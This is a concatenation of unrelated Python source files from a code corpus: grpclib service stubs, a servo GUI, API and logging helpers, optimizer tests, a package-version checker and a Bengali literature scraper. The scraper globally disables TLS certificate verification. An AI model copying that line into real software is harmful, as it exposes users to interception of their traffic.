"QueryTaxProceedsResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def indicators(self) -> "QueryIndicatorsResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def params(self) -> "QueryParamsResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def __rpc_tax_rate(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.tax_rate(**request_kwargs) await stream.send_message(response) async def __rpc_tax_cap(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = { "denom": request.denom, } response = await self.tax_cap(**request_kwargs) await stream.send_message(response) async def __rpc_tax_caps(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.tax_caps(**request_kwargs) await stream.send_message(response) async def __rpc_reward_weight(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.reward_weight(**request_kwargs) await stream.send_message(response) async def __rpc_seigniorage_proceeds(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.seigniorage_proceeds(**request_kwargs) await stream.send_message(response) async def __rpc_tax_proceeds(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.tax_proceeds(**request_kwargs) await stream.send_message(response) async def __rpc_indicators(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.indicators(**request_kwargs) await stream.send_message(response) async def __rpc_params(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.params(**request_kwargs) await stream.send_message(response) def __mapping__(self) -> Dict[str, grpclib.const.Handler]: return { "/terra.treasury.v1beta1.Query/TaxRate": grpclib.const.Handler( self.__rpc_tax_rate, grpclib.const.Cardinality.UNARY_UNARY, QueryTaxRateRequest, QueryTaxRateResponse, ), "/terra.treasury.v1beta1.Query/TaxCap": grpclib.const.Handler( self.__rpc_tax_cap, grpclib.const.Cardinality.UNARY_UNARY, QueryTaxCapRequest, QueryTaxCapResponse, ), "/terra.treasury.v1beta1.Query/TaxCaps": grpclib.const.Handler( self.__rpc_tax_caps, grpclib.const.Cardinality.UNARY_UNARY, QueryTaxCapsRequest, QueryTaxCapsResponse, ), "/terra.treasury.v1beta1.Query/RewardWeight": grpclib.const.Handler( self.__rpc_reward_weight, grpclib.const.Cardinality.UNARY_UNARY, QueryRewardWeightRequest, QueryRewardWeightResponse, ), "/terra.treasury.v1beta1.Query/SeigniorageProceeds": grpclib.const.Handler( self.__rpc_seigniorage_proceeds, grpclib.const.Cardinality.UNARY_UNARY, QuerySeigniorageProceedsRequest, QuerySeigniorageProceedsResponse, ), "/terra.treasury.v1beta1.Query/TaxProceeds": grpclib.const.Handler( self.__rpc_tax_proceeds, grpclib.const.Cardinality.UNARY_UNARY, QueryTaxProceedsRequest, QueryTaxProceedsResponse, ), "/terra.treasury.v1beta1.Query/Indicators": grpclib.const.Handler( self.__rpc_indicators, grpclib.const.Cardinality.UNARY_UNARY, QueryIndicatorsRequest, QueryIndicatorsResponse, ), "/terra.treasury.v1beta1.Query/Params": grpclib.const.Handler( self.__rpc_params, 
grpclib.const.Cardinality.UNARY_UNARY, QueryParamsRequest, QueryParamsResponse, ), } from ....cosmos.base import v1beta1 as ___cosmos_base_v1_beta1__
1.609375
2
usbservo/usbservogui.py
ppfenninger/screwball
0
11890
<reponame>ppfenninger/screwball # ## Copyright (c) 2018, <NAME> ## All rights reserved. ## ## Redistribution and use in source and binary forms, with or without ## modification, are permitted provided that the following conditions are met: ## ## 1. Redistributions of source code must retain the above copyright ## notice, this list of conditions and the following disclaimer. ## 2. Redistributions in binary form must reproduce the above copyright ## notice, this list of conditions and the following disclaimer in the ## documentation and/or other materials provided with the distribution. ## ## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" ## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE ## IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ## ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE ## LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR ## CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF ## SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS ## INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN ## CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ## ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE ## POSSIBILITY OF SUCH DAMAGE. # import Tkinter as tk import usbservo class usbservogui: def __init__(self): self.dev = usbservo.usbservo() if self.dev.dev >= 0: self.update_job = None self.root = tk.Tk() self.root.title('USB Servo GUI') self.root.protocol('WM_DELETE_WINDOW', self.shut_down) fm = tk.Frame(self.root) tk.Button(fm, text = 'LED1', command = self.dev.toggle_led1).pack(side = tk.LEFT) tk.Button(fm, text = 'LED2', command = self.dev.toggle_led2).pack(side = tk.LEFT) tk.Button(fm, text = 'LED3', command = self.dev.toggle_led3).pack(side = tk.LEFT) fm.pack(side = tk.TOP) servo1_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo1_callback) servo1_slider.set(32768) servo1_slider.pack(side = tk.TOP) servo2_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo2_callback) servo2_slider.set(32768) servo2_slider.pack(side = tk.TOP) servo3_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo3_callback) servo3_slider.set(32768) servo3_slider.pack(side = tk.TOP) servo4_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo4_callback) servo4_slider.set(32768) servo4_slider.pack(side = tk.TOP) servo5_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo5_callback) servo5_slider.set(32768) servo5_slider.pack(side = tk.TOP) self.sw1_status = tk.Label(self.root, text = 'SW1 is currently ?') self.sw1_status.pack(side = tk.TOP) self.sw2_status = tk.Label(self.root, text = 'SW2 is currently ?') self.sw2_status.pack(side = tk.TOP) self.sw3_status = tk.Label(self.root, text = 'SW3 is currently ?') self.sw3_status.pack(side = tk.TOP) self.a0_status = tk.Label(self.root, text = 'A0 is currently ????') self.a0_status.pack(side = tk.TOP) self.update_status() def set_servo1_callback(self, value): self.dev.set_servo1(int(value)) def set_servo2_callback(self, value): self.dev.set_servo2(int(value)) def set_servo3_callback(self, value): 
self.dev.set_servo3(int(value)) def set_servo4_callback(self, value): self.dev.set_servo4(int(value)) def set_servo5_callback(self, value): self.dev.set_servo5(int(value)) def update_status(self): curr_a0 = self.dev.read_a0() self.sw1_status.configure(text = 'SW1 is currently {!s}'.format(self.dev.read_sw1())) self.sw2_status.configure(text = 'SW2 is currently {!s}'.format(self.dev.read_sw2())) self.sw3_status.configure(text = 'SW3 is currently {!s}'.format(self.dev.read_sw3())) if curr_a0 is not None: self.a0_status.configure(text = 'A0 is currently {:04d}'.format(curr_a0)) self.update_job = self.root.after(50, self.update_status) def shut_down(self): self.root.after_cancel(self.update_job) self.root.destroy() self.dev.close() if __name__=='__main__': gui = usbservogui() gui.root.mainloop()
1.851563
2
GasBotty/models/utils.py
GreenCUBIC/GasBotty
353
11891
<reponame>GreenCUBIC/GasBotty try: from torch.hub import load_state_dict_from_url except ImportError: from torch.utils.model_zoo import load_url as load_state_dict_from_url
1.53125
2
pyzayo/svcinv_mixin.py
jeremyschulman/pyzayo
1
11892
<filename>pyzayo/svcinv_mixin.py """ This file contains the Zayo Service Inventory related API endpoints. References ---------- Docs http://172.16.17.32/wp-content/uploads/2020/02/Service-Inventory-Wiki.pdf """ # ----------------------------------------------------------------------------- # System Imports # ----------------------------------------------------------------------------- from typing import List, Dict # ----------------------------------------------------------------------------- # Public Imports # ----------------------------------------------------------------------------- from first import first # ----------------------------------------------------------------------------- # Private Imports # ----------------------------------------------------------------------------- from pyzayo.base_client import ZayoClientBase from pyzayo.consts import ZAYO_SM_ROUTE_SERVICES # ----------------------------------------------------------------------------- # Module Exports # ----------------------------------------------------------------------------- __all__ = ["ZayoServiceInventoryMixin"] class ZayoServiceInventoryMixin(ZayoClientBase): """ Supports the Service-Inventory API endpoints """ def get_services(self, **params) -> List[Dict]: """ Retrieve the service-inventory records given the `params` criterial or all. Other Parameters ---------------- key-value options as defined by the "existing-services" API endpoint. The `filter` parameter, for example, supports the following API record fields: * status * productGroup * productCatagory * product * term """ return self.paginate_records(url=ZAYO_SM_ROUTE_SERVICES, **params) def get_service_by_circuit_id(self, by_circuit_id: str, **params): """ Locate the service associated with the given ciruid ID. Parameters ---------- by_circuit_id: str The circuit ID string value Other Parameters ---------------- Same as get_services() method, see for details. Returns ------- The service record in dict form from API. """ return first( rec for rec in self.paginate_records(url=ZAYO_SM_ROUTE_SERVICES, **params) if rec["components"][0]["circuitId"] == by_circuit_id )
1.445313
1
pychron/core/helpers/logger_setup.py
aelamspychron/pychron
1
11893
<reponame>aelamspychron/pychron<gh_stars>1-10 # =============================================================================== # Copyright 2011 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =============================================================================== # =============enthought library imports======================= # =============standard library imports ======================== from __future__ import absolute_import import logging import os import shutil from logging.handlers import RotatingFileHandler from pychron.core.helpers.filetools import list_directory, unique_path2 from pychron.paths import paths NAME_WIDTH = 40 gFORMAT = '%(name)-{}s: %(asctime)s %(levelname)-9s (%(threadName)-10s) %(message)s'.format(NAME_WIDTH) gLEVEL = logging.DEBUG def simple_logger(name): logger = logging.getLogger(name) logger.setLevel(logging.DEBUG) h = logging.StreamHandler() h.setFormatter(logging.Formatter(gFORMAT)) logger.addHandler(h) return logger def get_log_text(n): root = logging.getLogger() for h in root.handlers: if isinstance(h, RotatingFileHandler): with open(h.baseFilename, 'rb') as rfile: return tail(rfile, n) def tail(f, lines=20): """ http://stackoverflow.com/questions/136168/get-last-n-lines-of-a-file-with-python-similar-to-tail """ total_lines_wanted = lines BLOCK_SIZE = 1024 f.seek(0, 2) block_end_byte = f.tell() lines_to_go = total_lines_wanted block_number = -1 blocks = [] # blocks of size BLOCK_SIZE, in reverse order starting # from the end of the file while lines_to_go > 0 and block_end_byte > 0: if block_end_byte - BLOCK_SIZE > 0: # read the last block we haven't yet read f.seek(block_number * BLOCK_SIZE, 2) blocks.append(f.read(BLOCK_SIZE)) else: # file too small, start from begining f.seek(0, 0) # only read what was not read blocks.append(f.read(block_end_byte)) lines_found = blocks[-1].count(b'\n') lines_to_go -= lines_found block_end_byte -= BLOCK_SIZE block_number -= 1 all_read_text = b''.join(reversed(blocks)) return b'\n'.join(all_read_text.splitlines()[-total_lines_wanted:]).decode('utf-8') # def anomaly_setup(name): # ld = logging.Logger.manager.loggerDict # print 'anomaly setup ld={}'.format(ld) # if name not in ld: # bdir = paths.log_dir # name = add_extension(name, '.anomaly') # apath, _cnt = unique_path2(bdir, name, delimiter='-', extension='.log') # logger = logging.getLogger('anomalizer') # h = logging.FileHandler(apath) # logger.addHandler(h) def logging_setup(name, use_archiver=True, root=None, use_file=True, **kw): """ """ # set up deprecation warnings # import warnings # warnings.simplefilter('default') bdir = paths.log_dir if root is None else root # make sure we have a log directory # if not os.path.isdir(bdir): # os.mkdir(bdir) if use_archiver: # archive logs older than 1 month # lazy load Archive because of circular dependency from pychron.core.helpers.archiver import Archiver a = Archiver(archive_days=14, archive_months=1, root=bdir) a.clean() if use_file: # create a new logging file logname = '{}.current.log'.format(name) logpath = 
os.path.join(bdir, logname) if os.path.isfile(logpath): backup_logpath, _cnt = unique_path2(bdir, name, delimiter='-', extension='.log', width=5) shutil.copyfile(logpath, backup_logpath) os.remove(logpath) ps = list_directory(bdir, filtername=logname, remove_extension=False) for pi in ps: _h, t = os.path.splitext(pi) v = os.path.join(bdir, pi) shutil.copyfile(v, '{}{}'.format(backup_logpath, t)) os.remove(v) root = logging.getLogger() root.setLevel(gLEVEL) shandler = logging.StreamHandler() handlers = [shandler] if use_file: rhandler = RotatingFileHandler( logpath, maxBytes=1e7, backupCount=50) handlers.append(rhandler) fmt = logging.Formatter(gFORMAT) for hi in handlers: hi.setLevel(gLEVEL) hi.setFormatter(fmt) root.addHandler(hi) def add_root_handler(path, level=None, strformat=None, **kw): if level is None: level = gLEVEL if format is None: strformat = gFORMAT root = logging.getLogger() handler = logging.FileHandler(path, **kw) handler.setLevel(level) handler.setFormatter(logging.Formatter(strformat)) root.addHandler(handler) return handler def remove_root_handler(handler): root = logging.getLogger() root.removeHandler(handler) def new_logger(name): name = '{:<{}}'.format(name, NAME_WIDTH) l = logging.getLogger(name) l.setLevel(gLEVEL) return l def wrap(items, width=40, indent=90, delimiter=','): """ wrap a list """ if isinstance(items, str): items = items.split(delimiter) gcols = iter(items) t = 0 rs = [] r = [] while 1: try: c = next(gcols) t += 1 + len(c) if t < width: r.append(c) else: rs.append(','.join(r)) r = [c] t = len(c) except StopIteration: rs.append(','.join(r)) break return ',\n{}'.format(' ' * indent).join(rs) # ============================== EOF ===================================
1.796875
2
picmodels/models/care_advisors/case_management_models/sequence_models/services/create_update_delete.py
bbcawodu/careadvisors-backend
0
11894
<filename>picmodels/models/care_advisors/case_management_models/sequence_models/services/create_update_delete.py import picmodels def create_row_w_validated_params(cls, validated_params, rqst_errors): if 'name' not in validated_params: rqst_errors.append("'name' is a required key in the validated_params argument") return None if cls.check_for_rows_with_given_name(validated_params['name'], rqst_errors): return None row = cls() row.name = validated_params['name'] row.save() if 'add_steps' in validated_params: steps_info = validated_params['add_steps'] cmstepsforsequences_rows = [] for step_id in steps_info: cmstepsforsequences_rows.append( get_stepsforcmsequences_row_with_given_id(step_id, rqst_errors) ) if not rqst_errors: check_steps_for_given_rows_or_matching_step_number( row.steps.all(), cmstepsforsequences_rows, row, rqst_errors ) if not rqst_errors: cmstepsforsequences_rows = sorted(cmstepsforsequences_rows, key=lambda k: k.step_number) for step_row in cmstepsforsequences_rows: check_steps_for_row_with_previous_step_number(row, step_row, rqst_errors) if rqst_errors: break row.steps.add(step_row) if rqst_errors: row.delete() return None row.save() return row def update_row_w_validated_params(cls, validated_params, rqst_errors): if 'id' not in validated_params: rqst_errors.append("'id' is a required key in the validated_params argument") return None rqst_id = validated_params['id'] try: row = cls.objects.get(id=rqst_id) except cls.DoesNotExist: rqst_errors.append('Row does not exist for the id: {}'.format(rqst_id)) return None if 'add_steps' in validated_params: steps_info = validated_params['add_steps'] cmstepsforsequences_rows = [] for step_id in steps_info: cmstepsforsequences_rows.append( get_stepsforcmsequences_row_with_given_id(step_id, rqst_errors) ) if not rqst_errors: check_steps_for_given_rows_or_matching_step_number( row.steps.all(), cmstepsforsequences_rows, row, rqst_errors ) if not rqst_errors: cmstepsforsequences_rows = sorted(cmstepsforsequences_rows, key=lambda k: k.step_number) for step_row in cmstepsforsequences_rows: check_steps_for_row_with_previous_step_number(row, step_row, rqst_errors) if rqst_errors: break row.steps.add(step_row) elif 'remove_steps' in validated_params: steps_info = validated_params['remove_steps'] cmstepsforsequences_rows = [] for step_id in steps_info: cmstepsforsequences_rows.append( get_stepsforcmsequences_row_with_given_id(step_id, rqst_errors) ) if not rqst_errors: check_steps_for_not_given_rows( row.steps.all(), cmstepsforsequences_rows, row, rqst_errors ) if not rqst_errors: cmstepsforsequences_rows = sorted(cmstepsforsequences_rows, key=lambda k: k.step_number) for step_row in cmstepsforsequences_rows: row.steps.remove(step_row) if rqst_errors: return None if 'name' in validated_params: row.name = validated_params['name'] if cls.check_for_rows_with_given_name(row.name, rqst_errors, rqst_id): return None row.save() return row def delete_row_w_validated_params(cls, validated_params, rqst_errors): if 'id' not in validated_params: rqst_errors.append("'id' is a required key in the validated_params argument") return rqst_id = validated_params['id'] try: row = cls.objects.get(id=rqst_id) row.delete() except cls.DoesNotExist: rqst_errors.append('Row does not exist for the id: {!s}'.format(str(rqst_id))) def check_for_rows_with_given_name(cls, name, rqst_errors, current_id=None): found_matching_rows = False matching_rows = cls.objects.filter( name__iexact=name ) if matching_rows: found_matching_rows = True row_ids = [] len_of_row_qset = 
len(matching_rows) for row in matching_rows: row_ids.append(row.id) if len_of_row_qset > 1: rqst_errors.append( "Multiple rows with name: {} already exist in db. (Hint - Delete all but one and modify the remaining) id's: {}".format( name, row_ids)) else: if not current_id or current_id not in row_ids: rqst_errors.append( "Row with name: {} already exists in db. (Hint - Modify that entry) id: {}".format( name, row_ids[0])) else: found_matching_rows = False return found_matching_rows def get_stepsforcmsequences_row_with_given_id(row_id, rqst_errors): row = None if row_id: try: row = picmodels.models.StepsForCMSequences.objects.get(id=row_id) except picmodels.models.StepsForCMSequences.DoesNotExist: row = None rqst_errors.append("No StepsForCMSequences row found with id: {}".format(row_id)) return row def check_steps_for_given_rows_or_matching_step_number(cur_steps_qset, given_steps_list, row, rqst_errors): for cm_step in given_steps_list: if rqst_errors: break if cm_step in cur_steps_qset: rqst_errors.append( "cm_step with id: {} already exists in row id {}'s steps list (Hint - remove from parameter 'add_steps' list)".format( cm_step.id, row.id, ) ) else: check_steps_for_row_with_given_step_number(cur_steps_qset, cm_step, row, rqst_errors) def check_steps_for_not_given_rows(cur_steps_qset, given_steps_list, row, rqst_errors): for cm_step in given_steps_list: if cm_step not in cur_steps_qset: rqst_errors.append( "cm_step with id: {} does not exists in row id {}'s steps list (Hint - remove from parameter 'remove_stepst' list)".format( cm_step.id, row.id, ) ) def check_steps_for_row_with_given_step_number(cur_steps_qset, given_step_row, row, rqst_errors): for cm_step in cur_steps_qset: if cm_step.step_number == given_step_row.step_number: rqst_errors.append( "cm_step with id: {} has a step_number of: {}, which already exists in row id {}'s steps list (Hint - remove from parameter 'add_steps' list)".format( given_step_row.id, given_step_row.step_number, row.id, ) ) break def check_steps_for_row_with_previous_step_number(sequence_row, given_step_row, rqst_errors): previous_step_found = False current_step_number = given_step_row.step_number if current_step_number <= 1: return None previous_step_number = current_step_number - 1 for cm_step in sequence_row.steps.all(): if cm_step.step_number == previous_step_number: previous_step_found = True break if not previous_step_found: rqst_errors.append( "Sequence with id: {} does not have a step with 1 less than step row: {}'s step_number (Hint - remove from parameter 'add_steps' list)".format( sequence_row.id, given_step_row.return_values_dict(), ) )
2.109375
2
elegy/optimizer_test.py
sooheon/elegy
0
11895
import jax import elegy import unittest import numpy as np import jax.numpy as jnp import optax class MLP(elegy.Module): """Standard LeNet-300-100 MLP network.""" n1: int n2: int def __init__(self, n1: int = 3, n2: int = 4): super().__init__() self.n1 = n1 self.n2 = n2 def call(self, image: jnp.ndarray, training: bool): x = image.astype(jnp.float32) / 255.0 x = jnp.reshape(x, [x.shape[0], -1]) x = elegy.nn.Linear(self.n1)(x) x = elegy.nn.BatchNormalization()(x) x = jax.nn.relu(x) x = elegy.nn.Linear(self.n2)(x) x = jax.nn.relu(x) x = elegy.nn.Linear(10)(x) return x class OptimizerTest(unittest.TestCase): def test_optimizer(self): optax_op = optax.adam(1e-3) lr_schedule = lambda step, epoch: step / 3 optimizer = elegy.Optimizer(optax_op, lr_schedule=lr_schedule) params = np.random.uniform((3, 4)) grads = np.random.uniform((3, 4)) rng = elegy.RNGSeq(42) optimizer_states = optimizer.init(rng, params) assert jnp.allclose(optimizer.current_lr(optimizer_states), 0 / 3) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 1 / 3) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 2 / 3) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 3 / 3) def test_optimizer_epoch(self): optax_op = optax.adam(1e-3) lr_schedule = lambda step, epoch: epoch optimizer = elegy.Optimizer( optax_op, lr_schedule=lr_schedule, steps_per_epoch=2 ) params = np.random.uniform((3, 4)) grads = np.random.uniform((3, 4)) rng = elegy.RNGSeq(42) optimizer_states = optimizer.init( rng=rng, net_params=params, ) assert jnp.allclose(optimizer.current_lr(optimizer_states), 0) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 0) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 1) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 1) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) def test_optimizer_chain(self): optimizer = elegy.Optimizer( optax.sgd(0.1), optax.clip(0.5), ) params = np.zeros(shape=(3, 4)) grads = np.ones(shape=(3, 4)) * 100_000 rng = elegy.RNGSeq(42) optimizer_states = optimizer.init( rng=rng, net_params=params, ) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert np.all(-0.5 <= params) and np.all(params <= 0.5) def test_lr_logging(self): model = elegy.Model( module=MLP(n1=3, n2=1), loss=elegy.losses.SparseCategoricalCrossentropy(from_logits=True), metrics=elegy.metrics.SparseCategoricalAccuracy(), optimizer=elegy.Optimizer( optax.adamw(1.0, b1=0.95), lr_schedule=lambda step, epoch: jnp.array(1e-3), ), run_eagerly=True, ) X = np.random.uniform(size=(5, 7, 7)) y = np.random.randint(10, size=(5,)) history = model.fit( x=X, y=y, epochs=1, steps_per_epoch=1, batch_size=5, validation_data=(X, y), shuffle=True, verbose=0, ) assert "lr" in history.history assert np.allclose(history.history["lr"], 1e-3)
2.484375
2
scripts/version.py
nfnty/docker
54
11896
<filename>scripts/version.py #!/usr/bin/python3 ''' Check image package versions ''' import argparse import distutils.version import re import subprocess from typing import Any, Dict, Sequence, Tuple import lxml.html # type: ignore import requests from termcolor import cprint from utils.image import IMAGES, path_dockerfile TIMEOUT = (31, 181) # (Connect, Read) HEADERS = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0'} def args_parse(arguments: Sequence[str] = None) -> argparse.Namespace: ''' Parse arguments ''' par0 = argparse.ArgumentParser(description='Image package version checker') method = par0.add_mutually_exclusive_group(required=False) method.add_argument( '--include', metavar='IMAGE', action='append', choices=IMAGES.keys(), help='Include image(s)', ) method.add_argument( '--exclude', metavar='IMAGE', action='append', choices=IMAGES.keys(), help='Exclude image(s)', ) return par0.parse_args(arguments) def fetch(url: str, timeout: Tuple[int, int]) -> Any: ''' Fetch URL ''' try: response = requests.get(url, headers=HEADERS, timeout=timeout) response.raise_for_status() except (requests.exceptions.Timeout, requests.exceptions.HTTPError) as error: raise RuntimeError('fetch: {0:s}\n{1:s}'.format(str(error), str(error.response.content))) except OSError as error: raise RuntimeError('fetch: {0:s}'.format(str(error))) return lxml.html.document_fromstring(response.content) def document_parse(document: Any, xpath: str, attribute: str, regex: str) -> distutils.version.LooseVersion: ''' xpath version extractor ''' nodes = document.xpath(xpath) if not nodes: raise RuntimeError('Incorrect xpath: No nodes') versions = [] for node in nodes: if attribute: string = node.get(attribute) elif isinstance(node, str): string = node else: string = node.text if regex: obj = re.search(regex, string, flags=(re.MULTILINE | re.DOTALL)) # pylint: disable=no-member if not obj: continue elif len(obj.groups()) > 1: raise RuntimeError('Incorrect regex: More than 1 capture group') string = obj.group(1) if not string: raise RuntimeError('Incorrect regex: Invalid capture group') versions.append(distutils.version.LooseVersion(string)) if not versions: raise RuntimeError('No matching versions') version: distutils.version.LooseVersion = sorted(versions, reverse=True)[0] if not version or not hasattr(version, 'vstring'): raise RuntimeError('Version is invalid') return version def version_scrape(url: str, xpath: str, attribute: str, regex: str) -> distutils.version.LooseVersion: ''' Scrape latest version from url ''' document = fetch(url, TIMEOUT) return document_parse(document, xpath, attribute, regex) def version_pacman(package: str) -> Dict[str, distutils.version.LooseVersion]: ''' Return dict with repository versions of package ''' try: output = subprocess.run([ '/usr/bin/expac', '--sync', '--search', '%n %r %v', r'^{0:s}$'.format(re.escape(package)), ], check=True, stdout=subprocess.PIPE).stdout.decode('UTF-8') except subprocess.CalledProcessError: raise RuntimeError('{0:s} not in any repository'.format(package)) versions: Dict[str, distutils.version.LooseVersion] = {} for line in output.splitlines(): name, repo, version = line.split() if name == package: versions[repo] = distutils.version.LooseVersion(version) return versions def dockerfile_update(path: str, variable: str, version: str) -> None: ''' Update Dockerfiles with current version ''' with open(path, 'r') as fobj: newfile, found = re.subn( r'{0:s}=\'\S*\''.format(variable), '{0:s}=\'{1:s}\''.format(variable, version), 
fobj.read(), ) if not found: raise ValueError('Did not find ENV variable') elif found > 1: raise ValueError('More than 1: {0:s}'.format(variable)) with open(path, 'w') as fobj: fobj.write(newfile) def main() -> None: # pylint: disable=too-many-branches ''' Main ''' subprocess.check_call(['/usr/bin/sudo', '/usr/bin/pacman', '--sync', '--refresh']) if ARGS.include: images = {image: config for image, config in IMAGES.items() if image in ARGS.include} elif ARGS.exclude: images = {image: config for image, config in IMAGES.items() if image not in ARGS.exclude} else: images = IMAGES for image, image_dict in sorted(images.items(), key=lambda item: item[0]): cprint('\n{0:s}'.format(image), 'white', attrs=['underline']) if 'Check' in image_dict and not image_dict['Check']: print('Not checked!') continue if 'Packages' not in image_dict: print('No packages!') continue for package, package_dict in image_dict['Packages'].items(): cprint('{0:s}:'.format(package), 'yellow') for source, source_dict in package_dict['Sources'].items(): try: source_dict['Version'] = version_scrape( source_dict['URL'], source_dict['XPath'], source_dict['Attribute'] if 'Attribute' in source_dict else None, source_dict['Regex'] if 'Regex' in source_dict else None, ) except RuntimeError as error: cprint('{0:s}: {1:s}'.format(source, str(error)), 'red') source_dict['Version'] = None try: for repo, version in version_pacman(package).items(): package_dict['Sources'][repo] = {'Version': version} except RuntimeError as error: cprint(str(error), 'red') for source, source_dict in package_dict['Sources'].items(): print('{0:15s}{1:s}'.format( source, source_dict['Version'].vstring if source_dict['Version'] else 'None', )) if not package_dict['Sources'][package_dict['Download']]['Version']: cprint('No Version for Download: {0:s}'.format( package_dict['Download']), 'red') continue dockerfile_update( path_dockerfile(image), package_dict['Variable'], package_dict['Sources'][package_dict['Download']]['Version'].vstring, ) if __name__ == '__main__': ARGS = args_parse() main()
2.421875
2
nazrul.py
rakesh0703/Content_Parser_of_works_of_kazi_nazrul
0
11897
# -- coding: UTF-8 -- """ Spyder Editor This is a temporary script file. """ from bs4 import BeautifulSoup import sys import os import ssl ssl._create_default_https_context = ssl._create_unverified_context import urllib.parse,urllib.request,urllib.error base="https://nazrul-rachanabali.nltr.org/" page=urllib.request.urlopen(base).read(); soup=BeautifulSoup(page,'html5lib') ba=soup.find_all("ul",{"class":["slidedoormenu"]}) #print(ba) d=soup.div.ul.find_all('a') #type(d[3]) article_page=(d[3]).get("href") #soup.div.ul.li.a newurl_2=base+article_page page1=urllib.request.urlopen(newurl_2).read() soup1=BeautifulSoup(page1,'html5lib') e=soup1.find_all('a') arr1=[] arr4=[] for link in e[1:9]: f=link.get('href') f=base+f arr1.append(f) arr4.append(link.get_text()) #for k in arr2: for m in range(0,len(arr4)): page1=urllib.request.urlopen(arr1[m]).read() soup1=BeautifulSoup(page1,'html5lib') x=soup1.find_all('div',id='data') arr2=[]; arr3=[]; for i in x: g=i.find_all('a') for k in g[:-7]: arr2.append(k.get('href')) arr3.append(k.get_text()) for z in range(0,len(arr3)): final_url=base+arr2[z] #============================================================================== # page1=urllib.request.urlopen(final_url).read() # soup1=BeautifulSoup(page1,'html5lib') # head = soup1.find_all("p",class_="head1") # headd=head[0].get_text() #============================================================================== filenam = "D:\%s\%s"%(arr4[m],arr3[z]) if not os.path.exists(filenam): os.makedirs(filenam) for i in range(0,110): if arr3[z].endswith(" "): arr3[z]=arr3[z][:-1] filename = "D:\%s\%s\%s_%d.txt"%(arr4[m],arr3[z],arr3[z],i) fi = open(filename, "wb") page1=urllib.request.urlopen(final_url).read() soup1=BeautifulSoup(page1,'html5lib') final_url=base+arr2[z] h=soup1.find_all('div',id="data") for j in h: fi.write(j.text.encode("utf-8")) s=j.text if not s.split(): break a,b=final_url.split('1&titleid=') final_url=a+str(i+1)+"&titleid="+b print('************'+final_url+'***********') fi.close()
2.828125
3
algoplex/api/order.py
dmitryaleks/algo-plex
0
11898
<reponame>dmitryaleks/algo-plex class Order(): def __init__(self, side, pair, size, price, stop_loss_price, id): self.side = side self.pair = pair self.size = size self.price = price self.stop_loss_price = stop_loss_price self.id = id self.fills = [] def define_id(self, id): self.id = id def add_fill(self, execution): self.fills.append(execution) def get_fill_price(self): nominator = sum(map(lambda f: f.size * f.price, self.fills)) fill_price = nominator/self.get_filled_quantity() return fill_price def get_filled_quantity(self): return sum(map(lambda f: f.size, self.fills)) def get_fills(self): return self.fills
2.765625
3
core/handler.py
mh4x0f/kinproxy
5
11899
